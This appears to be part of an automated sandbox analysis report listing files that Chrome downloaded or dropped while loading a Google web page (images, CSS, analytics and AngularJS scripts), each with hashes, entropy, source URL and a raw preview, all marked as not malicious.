                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:Nl9+gvA8owLA6d6C1z+07HvVyjGI+RNl1ynnoz1Rx9sTcdh8y3ETvtL2oDs1i6:NbfTA6A4+gHIyI2YQx9sTcbCL2ks1V
                                                                                                                                                                                                                                                                                          MD5:C749B23D634961F33E16EBC183C36D3A
                                                                                                                                                                                                                                                                                          SHA1:0F291F12A3185153164BF3760BB33E49A4C1544E
                                                                                                                                                                                                                                                                                          SHA-256:6E987B94E1D96926168CEBBCDDD5ECDCA93B8E6B804DEBBA7A606D7670292356
                                                                                                                                                                                                                                                                                          SHA-512:EB144F36CE7494B38848E596DAAE5CFD20EF0E29BE7B3CFD562C0ED5D89EEEA1A30DA55E3F7EC7202301AA3F6DDD758169DD0EA7FFC475B4E0641235DBBD1120
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/jUoaTIlBn5ibfQcND2n5OMD6Z7xoqNj-ShHlFR6QuLffLXD5pS8V2eNg1rGlrsRrnDkoQ28O8UHzqzBQKAGY4l1CS2NQSq2SkRScK6FOjl82jppyohK-
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...............[t....sBIT....|.d... .IDATx..y.$ey...[...{/{....x..o..QT@. ...".J~..DM.F..&.<.QP..(.(.CD..9....cvvw....}....VuuOwO.......~...z...>....0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0+..t..f.<...=.u..Z..T.;...J.A:.D...2...9.pL.y.....@ !.@..nP..()....p.GR....L..eC.KP.2d.$.T....~^.7m..L.p...[.S.0.....5....O.}....}}E9..!e...)3Mj......B;....*...D.......K..GA9.HJT...R...@........l.r..<,....3.......
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9027), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9027
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947824943141241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:GFmlLkHo/a1rOQEo/eKO1O/XozXo/5VoD9ScNOR7cibmxuWK6:GcNn/a1rB//eKO1OQM/0D97OdCxu4
                                                                                                                                                                                                                                                                                          MD5:8F51790BFFFCC31ED97977E0F694A3A6
                                                                                                                                                                                                                                                                                          SHA1:734B38A9909BB10C3F8C6ACDABAF90BE5B01223C
                                                                                                                                                                                                                                                                                          SHA-256:372DCB604072BE98F12E6B48ECF53AA4238767FB34CC47723EEB3FC5552A65D0
                                                                                                                                                                                                                                                                                          SHA-512:EFCCC6A6A96FE86D3F955CC8D10E51EAA8E8230ADA7E57B6DD1110FAFC39F511D71480A20FCE51A7633F947634BB637B023828672C11E268C20DE32D00D5E3F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.css
                                                                                                                                                                                                                                                                                          Preview:.glue-cookie-notification-bar__accept,.glue-cookie-notification-bar__reject{font-size:1rem;line-height:1.5;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;text-rendering:optimizeLegibility;-webkit-align-content:center;-ms-flex-line-pack:center;align-content:center;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;-webkit-align-self:flex-start;-ms-flex-item-align:start;align-self:flex-start;border:1px solid transparent;border-radius:48px;display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-flow:row nowrap;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-flow:row nowrap;flex-flow:row nowrap;font-family:Google Sans,Arial,Helvetica,sans-serif;font-weight:500;-webkit-justify-content:space-around;-ms-flex-pack:distribute;justify-content:space-around;le
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4437
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.923976804215128
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:hjvpGFrQ8YLH+gBJ1DYRtPIhwEhIcN4cp8329Rd8IoI6IlAlJ:hjvp2YCgBPDYRtwhciVp832CIVAlJ
                                                                                                                                                                                                                                                                                          MD5:E26885170F89158FEB6AF797E52A979F
                                                                                                                                                                                                                                                                                          SHA1:A2C5820CE8368C804BEE88F738E53598F5C26406
                                                                                                                                                                                                                                                                                          SHA-256:F170EAAF0080C70EAFA8D4DC444985C89AD349DD03A3E934702606212D35EFC0
                                                                                                                                                                                                                                                                                          SHA-512:D14ACF200E86D7CD61FBFF0156EAD10463EFF08C650FE11C2FB50F50740D7281FDFBE3EE67CD90F612181C2479E91BB2CA6E3EB0FB4927B42F18DB0296B1633A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{...}.?=3.{..I...q'.....SHF.........8.8Q..2).(.X.)bo.......p...:.O........&.e...../I'....<:....................|.7..._wC..5j.Q.F..5.C.m@.I..z`"`.......+.2sa..._I..i+.........&...O........x.x'.2.....|..N.......`.J.).Q.....lF..$......._...iK....%.g(.....g.{...)........'..$.Z.l`..EJ...~.'...2Cc\..L[S..@.H.\|.....M..}.;0..yq..,.rU......R.d...+.Q.U..8&.2e@......cd...K..u.....N.d.....^..._.+.o..+g....L.1......0...9x.?.q........aU>......e..Zr.@"...sa2m.....0.....3.]s...).....6.c......R.........x.....5...mD)D^`.".........n..zUO......q.gC..o..H...h.|.....H..fX......z..Q.....ikQ..Dd..=.0..B<..... Z.....zU.a.R..............(/..2....)F$..3....@.!A.N..E.U....I....R.....J./....,E..9"'..1.3&J)@...f..At%....L[..6d8........X.|...\...1.e..GK...U,./."%0.....?...af....FZ`P./../......\..z|....%..g.<
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):909
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.651319498790687
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:vGM0cb7aIIbGPHK5OM0Q06bSvveaMbqgqnQHAQk1:vt0EGII6pMr04SOhOgqfH
                                                                                                                                                                                                                                                                                          MD5:7E6F0B676A78D442ED84C9C58889712C
                                                                                                                                                                                                                                                                                          SHA1:7FA3EE919ADB09C312DE5B914530BBEFB6F9F1D4
                                                                                                                                                                                                                                                                                          SHA-256:EF196BF50E065E0431247BEC81E27DAA06AC5B7EFAC6F38287882B9496AFB224
                                                                                                                                                                                                                                                                                          SHA-512:DD2374C5306BBFCC1DF8F65171C4A05AA6B779BA8EE1CA6E564B2C7799C3A649CF367A2576674C183AF4C2ECF4DE32AAD12A09BA0457DE3E5B137A3ADBAB824C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.............sBIT.....O....ZPLTEGpL...B...C5B...C5<.....B..B..4.S.C5.........4.S...B........4.SB......C5B........B...C54.SP.hb....tRNS.evN.....M..}?.....W.$..L..Y....IDATh.... ..5.9F3..I..57....l.P...7e}..4.f.H$...U...e...E.T.XIV...{..tmS.R..W[...OM..}..)..^..X.i.h..d..P..Vv.:lW[{gs@-q...py....."...D.u.q..C.`.... .v.4#D..*.I...-8...fxg..y..;..3K.9.....?.*-.eyU.......nV.[.RU?=...k.aS...Z>....%.<.'.fb.4T+.[.......=...._,.........#..9.'&y.3]./m...`..AW>..>.T\.m.....;W.v*...Y.W..@$..8.Bl.R.b.......q.ub.c..T.vH.....6..w.!.Z.....< .....9.j"m...@....k......V.wi...]S}.^.s/.....r.6?.......&...l..i....."..p]....z,..T.A...6..@_..F.....g.h....xk..}.Q...T..^D~.qv.>.I/m.._.u{<..q{]Q........jZ..:......e^J...0....Ry)...J.F.u^J..)M.Q.}...{.ML.a.,.L....."=....v&/.8{.1.XI64.....?q..G..h}.m.WG;.......#...\..xsu..D..S...&.....@".H...............IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):183
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.225139620621421
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:JSmF+X/MKx8J8MLSHeoPAGQP3mDDUwKCJspoU1hvLWfLRat+2eFPKMLGRNL8BO8/:Y/MK6yMbo4j35wK/RhgLRat+2YyRiEmZ
                                                                                                                                                                                                                                                                                          MD5:6EA0864D3FDC90EDD1A6E71DBACF10D2
                                                                                                                                                                                                                                                                                          SHA1:88BCA6577741AC5BEA5E7B2C9F91C66BE2B9DDC1
                                                                                                                                                                                                                                                                                          SHA-256:04FA58465356AF4FF417565333A1FEE8CB7EB0EFD616AE4ADED9299F337DFB46
                                                                                                                                                                                                                                                                                          SHA-512:0CAC6D4FDED37F492A96A84FB8470CDD013187A6C8905DC3256BA42109F402963DEFFA3378E32C0477B27748A6E350220D7402D42FEF4BCB86BA25B103067AAC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{n as r}from"./IYoTYjYE.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */function o(t){return r({...t,state:!0})}export{o as t};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):279952
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.613847201529661
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:TiJpmFU7ili04d7G3BsEemve+N3H0fxnPk:WyW7i4nhios
                                                                                                                                                                                                                                                                                          MD5:86AF0602E129FB5659F3A6FD17E657EE
                                                                                                                                                                                                                                                                                          SHA1:6FC94985D38A102740B86DA537C7CAD05871A387
                                                                                                                                                                                                                                                                                          SHA-256:7E07E3FFEA4738198E06039131BB8921E76036EC4CF9D549C74B364AB773881F
                                                                                                                                                                                                                                                                                          SHA-512:E98B46CE417755AE251EC3BEF04ADEA947CB67F5E4AD0D3783AD807970A989F77848D4E9671950EA846D2FCB767A90858CA7BC2715AA7870B544AC10C554040E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-JFPSXCWF8W&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_auto_events","priority":18,"vtp_enableScroll":false,"vtp_enableOutboundClick":false,"vtp_enableDownload":false,"vtp_enableHistoryEvents":false,"vtp_enableForm":false,"vtp_enableVideo":false,"vtp_enablePageView":true,"tag_id":8},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isEnabled":false,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_S
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2782
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.86644364761673
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:IbHoPU+4dRpNB7DoJcUgLuIk5QgeUn5+rFcw+ojdv6DVcXOL:IUPudT77wcJ45reUSO5oByeA
                                                                                                                                                                                                                                                                                          MD5:75B4C69FAC6070DF54DB1E1377FBD36E
                                                                                                                                                                                                                                                                                          SHA1:42B7AEC1F24D059CA09253C7F67CEDB3C3307BB0
                                                                                                                                                                                                                                                                                          SHA-256:09DD303147ED39973BD574C4B1FFCC0872C6ACCEF3809B5243D540B1CDE27239
                                                                                                                                                                                                                                                                                          SHA-512:5323186B70CFDE088259502580408EE8CEEF19556E1AFD1455FCF03323F4DFF43B8EDE4199D8CBC317620DF497CDF21055BCDF54939CB7F92DEB2DDFCD180A3D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i5!3i4!4i256!2m3!1e0!2sm!3i707457389!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=24213
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?._...$8....#.`..m.8.........i$...S.%.......;.U..%B..8K......o.H.:.&.9.v.t..5..nW.&...a.D...DI...J..#._\&...G..@......CJ....X.0.e.f6).... +...(i.;...Y..=k...a..ec.....f6..3.:....Ew..]cz`W.../...1.X.lG0.eG.u............RTjd~5.u4..bID..0Gf`o.C .).-:...n....'6....$MP..}.'"..e...5C..Z@ZF.=I....d`y.c.G...@5.}.^.j.a.rc.5....@.]...0.........xb.....'....f.e6#,..d.0...h.....G.3..Yc43.?....W.@J-wL..3'..0.S...7........E..DO}0..Z~$.-..L1.........?..f.>R..*-.0z.&....`.v..........>^.._.<}......._A.t5.6..Hh.G..._k........g..}.....>:...~....6.`..t.%d.h.0.c.../|.;o...?[~...>...?...U.E.dS...].lF..._.&..._|t..g...g.......N.`..A.e.3.x....K...3...g....>Z%'1=+J&!z,..l..g.......e./....&u..f....4..f0.8._.D...~......%...N..).:..e...7......7...g}...'....@:..4....7..wWG.'._+'.5 .....).h{.....k..+R....CB.Ji..:.2.-3...3.J...H.T..3....&.$t...R.tk.kxK....4m.-...q0(&F..=B.RA...4|&W.-m..Va*DG6=..Z.........I.e...*.H<.A..+.F.'...+..9.A....B..a`.xQ.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 341, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):314962
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9859735903528755
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:BIFzP9uWvYtYOZl0q58b83xyuB0MbawZxr1SAIqTgXtD9z95fVR4rHo7:mzlNlOZB8qyQlbaar1PEdDRTfVYW
                                                                                                                                                                                                                                                                                          MD5:FE48F024C754220B710A16F58BEF7968
                                                                                                                                                                                                                                                                                          SHA1:CD19A340822BFB160653306DE9C5A650AD173962
                                                                                                                                                                                                                                                                                          SHA-256:A3BB294D6D53266AA00A1D5820CA8D09B55AF55A5A61C473CD7115C95085BDBE
                                                                                                                                                                                                                                                                                          SHA-512:C0E53286C007EA5EF6AB3E653FF0C03110B663FFE8009EF39433A8C3EFB2368BD7F08003F4C4AE3B8124F78B88220A5CC52C301D4E9F7DA023D091FEA76F59F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......U........t....IDATx.d.Y.,Y.....cf>...7.{.b.s......1.Ud..&..@v.RS. ....W......[h.lu....".j..HV....)r........}6.s..[.f~_............{...>......^.f...f.....;.(.L...IE.s.D.c".dH..sJ>.".hDNU.g&..\. ..CL.f..@. ..I.T.I........ZJ...A....l...L..........!.C`...X.g.>)..\.m...!..]..<....wO..x...W.o.9..E..../.....Q.5K.fROmyn..6s....~<q..1.+.;44..^IN.D.!.".....HnADS..hlL.....b((.XV~....%.oS9.....3..C"2TP..0TU$....@....j.h.H.....b....`f.H...f......*v.................z'..L.}B.IsTQ..L.L. .T.....\]...0....\RVD.i....|6]...."........O?.)<...>..w.u...=...+7.~iwg....7_..w.G..?.........k..m..?z..o..b..^.../../.......w........_.r..j..k.?...w.._.....v....o.[.}4[.>.N..i.V..._...^......{..o.v...hY.....[........a.......'............./../...K....P..........U/V...............[..ff...j....X.3.+.2.....RJhH.`.AM.... `VP#.c$D.SB....cQ300%"QE0$.QD...PTG....0."23....:B .......$%a..............Q......;9C..g.LMJ..h..@.....h.......(...g.Ur.. @.0..`.n.....L.6.J.@
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4076
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.340062903633837
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:+KCTi4CmLQW+r0aNuV44tErsL3KbGOXSCWKOKjinR:+VpCSQ/r0aNgF8bGOXXWKvmnR
                                                                                                                                                                                                                                                                                          MD5:8E4770857D0E58A937D1DB748259D643
                                                                                                                                                                                                                                                                                          SHA1:B8D02156AA686F577AC14D45D71CE955BDB0E290
                                                                                                                                                                                                                                                                                          SHA-256:360B129FF44217AB7FB3246B6B1E4625DAFF41C2958599FB031A365AB4EF6DE2
                                                                                                                                                                                                                                                                                          SHA-512:3EF4944FF843FB6C5DCBCA2B6030082CD8F18E4658497AA0FBACF7DC08F8D415E6B773071A190FC89B8CEAA80B59F7346D345BDD71C347AD96393A7AA6BFBCB9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/angularjs/1.6.10/angular-touch.min.js
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(x,p){'use strict';function s(f,k){var e=!1,a=!1;this.ngClickOverrideEnabled=function(b){return p.isDefined(b)?(b&&!a&&(a=!0,t.$$moduleName="ngTouch",k.directive("ngClick",t),f.decorator("ngClickDirective",["$delegate",function(a){if(e)a.shift();else for(var b=a.length-1;0<=b;){if("ngTouch"===a[b].$$moduleName){a.splice(b,1);break}b--}return a}])),e=b,this):e};this.$get=function(){return{ngClickOverrideEnabled:function(){return e}}}}function v(f,k,e){n.directive(f,["$parse","$swipe",function(a,.b){return function(l,u,g){function h(c){if(!d)return!1;var a=Math.abs(c.y-d.y);c=(c.x-d.x)*k;return r&&75>a&&0<c&&30<c&&.3>a/c}var m=a(g[f]),d,r,c=["touch"];p.isDefined(g.ngSwipeDisableMouse)||c.push("mouse");b.bind(u,{start:function(c,a){d=c;r=!0},cancel:function(c){r=!1},end:function(c,d){h(c)&&l.$apply(function(){u.triggerHandler(e);m(l,{$event:d})})}},c)}}])}var n=p.module("ngTouch",[]);n.info({a
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2222
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8730726200985295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:IUXAy0GN04/mwrWupfQzgLziuICrZrxUsIB8laSW7l3agXXoK:Oy0PwmYppfAgLziggsIGWP
                                                                                                                                                                                                                                                                                          MD5:A3419949626E50545681DB7C301C5D47
                                                                                                                                                                                                                                                                                          SHA1:1F4DE8632610E84482651EA0A8CB2ADCF70EBA86
                                                                                                                                                                                                                                                                                          SHA-256:2DF779D9557603350D38FC3357075048A1761A17CA2E9AA3586D07971D9BC2B6
                                                                                                                                                                                                                                                                                          SHA-512:8D9858BDAB6EAA8A6190BC8645267B44B81E07D6C0C5DBE3A628419BAE08051FEBE6FA47BFBD56062BA1273FE0D24E301952A89A2DD78B5306F48B9B122DA613
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/T4GMYGBcpiDg5gCEZGSvQWbkwLHRELiaWN-BAAPD8Skd-YAEBhCxSR7_a5HjrHhqhgYDLvk7Ck_Y_R3-uM_UTA4prjTHB2ecsUG9EfjDcMyX7GxSju8=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....eIDATx.._.\U..?ww....J,..jb .Py.......35ML,e..m..@./...*..`.M.Z...B".vZ\hM...s.hP.,.!..5.K..X..vCwv...UZv.{.s...e{......g......`0.....`0.....`0....a.b...../...J...w.C.c&.....`u....m...k.."vR....(!<.c...`....k.J.....m.v.`.0.....h....skB..IjZX....*........4e.......V. .jV[+.2x./...BU..X.>...`H................4DK.9.,......X....I.. ..dk...6..7.y...oi..'r.[..Kt.D...!.=.G...k39FV?......L.g...\..X_...........R..x...X..^Z../....r.....].R.7y.*.|.#*u..._g,^(~.+....v....pr.......e.;^.Y......T........,../..\..s..]D.g.......K.6.L..SO../......nIi].t../......Wy..4w......e..%.jtz|..Yy]D.+...[C8*3....xq......%Ou.._..\.%..'.`..V.o...Sa.....a.....\..w.y.|E?#1.v,...nj%..:A.x.JkK)O......tQ.Y..`..C.gN....p. .....k.a..|....0...GEs.e..1...(......(L.......1..'Wn.[T[...V46|.. ..#...'.b.*;D.5e....(..b5. Wnm.^.Q%N......`9p]..!\/.....u....t}oC........q.>/...r..y`$jy.Xm.6D_...}.~@P+3..8m....B.....=,..E..I.6..Q..F,...N...&Q.x
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x384, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):75403
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983412784961348
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:u0atjKbuQTXTs5KppiRsh9eZyBH81LopJAy2aL+GlhlrWl/ZIojNOYTmIgVZ+ZCi:u0Ungg56wJOLx2ai0hlrWFZIsNzPQY
                                                                                                                                                                                                                                                                                          MD5:FB6BD2446FA4DC80CD5E8EEED326793B
                                                                                                                                                                                                                                                                                          SHA1:0D385B63CC3CAA56F11D689898DE7B8672146CD2
                                                                                                                                                                                                                                                                                          SHA-256:3657E5EB03A4AAB54F1617134E5974ADFB32E9422D064EBB6347287BCC4B59E6
                                                                                                                                                                                                                                                                                          SHA-512:62A739FC861F9A30817E50E5FC0074F0D796441B5039133D6AE26C909C2648D6D455C04287F8A7CCF06E76743F16B0E753F6FB0188B68CA10F024C1F2DDD8FA3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/3vbmf-fE3hNTz_sGEcwIXWDO025BKBEfKgf8kLwMUqsTGFJNuEsBevc5aoUDXs0LeGQuxV3I55z3JelOJRYTxKzdoTWPoueELAx2WWZ-b-XO5vK1VQ?=w1440
                                                                                                                                                                                                                                                                                          Preview:......JFIF.....................................................................................................................................................................................................H........................!.1A..."Qa2q...#...B...Rb..$3Cr....Scs...4..T.................................@......................!..1A.Qa."q...2.....B..#R.3br..$.4...c..............?...".....x..:..I&.I#&.j..c.R.q.t$..#.pI!.............mO..l....{...-.8~s%*E.....1....dI.....VE...24...KD..H..$...........\....e....a.p..G:.*...\x.O...B.p..Z....=.}..n&./..[.Yo.e....O-.>53er.I!..8..c..........f.(..d....C.>.f......R.@...4y..~.v......n...F.>id.Xe....n4...-..i.............f.4...v.......i.x.E.<P.F*].7h...5..U.$X...?0.......Aq..2..BL.k.)......!`..)..I$.(.....(.A...W..,|;Q.A.~...(.....~...f.v!.........^.....W:0..).9.?...:..|H*0.G.P:.F..#.<C.*.H..../.o_ax..%.9u*...R.s.:...;g..C.-...}W...X..#...L..Z%.~G..O ..y2.v.u..^..*O.Vf.>W.'ez....Z#.I'....F........($.,.v...H.N..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):817
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.381646783346233
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/79B/6Ts/G43jjRB4iS/4bSHOOO4u7zzzzzzzbgkokpAfdhXJ2/oi/3ypm353o:O/6+3xHNt7zzzzzzzbo5lj726m35gz3
                                                                                                                                                                                                                                                                                          MD5:8241731FF6D4C4B54D50DDB229ABD5AD
                                                                                                                                                                                                                                                                                          SHA1:732D211AA1407DF9DD3E68728D62A1F92286A716
                                                                                                                                                                                                                                                                                          SHA-256:D89908B7F4188864173BBDB3021BAF269468E9117BB0717CAA9823E4578961D0
                                                                                                                                                                                                                                                                                          SHA-512:AC847205DCE1EB6E0F9B21E935B10C2F4C939B0F1AD38D62C2DD9DAFE87AF4D4D6A0F9D79F30F1948D7D627136D2DFD90322955023818A1C42250202CF328AF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/dMQ1Q4xlLrl3-KsZvX_9v56emij4OkRxzapLM7RSuZVd7PgqfjPxKR4KY8hVHYXqP2ZkS-_ZueXb9ywW66H2oCyTglApr1ELCy3woOAviTgFP6uyAd0=h120
